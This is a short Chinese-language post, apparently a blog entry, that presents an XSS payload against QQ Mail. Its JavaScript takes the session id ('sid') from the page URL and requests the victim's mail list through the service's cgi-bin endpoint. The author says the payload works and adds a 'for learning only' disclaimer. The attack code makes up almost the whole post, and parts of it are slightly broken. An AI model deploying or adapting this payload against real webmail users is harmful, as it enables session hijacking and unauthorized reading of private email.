QQ邮箱XSS注入攻击有效payload
1 network中看到请求,经过分析后找到实际请求
遂将所有参数修改,并截取有效sid
var sid="";
if(top.window.location.href.indexOf("sid")>0){
var href=top.window.location.href;
sid=href.substring(href.indexOf("sid")+4,href.indexOf("&"));
}
console.log("sid="+sid)
var floder_url="https://"+top.window.location.host+"
/cgi-bin/mail_list?sid="+sid+"&page=0&sortasc=0&sorttype=7";
var ajax=null;
if(window.XMLHttpRequest){
ajax=new XMLHttpRequest();
}else if (window.ActiveXObject){
ajax=new ActiveXObject("Microsoft")
}
console.log("ajax="+ajax);
ajax.open("GET",floder_url,true)
ajax.send(null);
console.log(ajax);
if(ajax.readyState==4&&ajax.status==200){
console.log("ajax="+ajax.responseText);
}
最终响应为
该文档Payload有效
ps:该文档仅供学习切勿犯法,如需转载,需注明出处。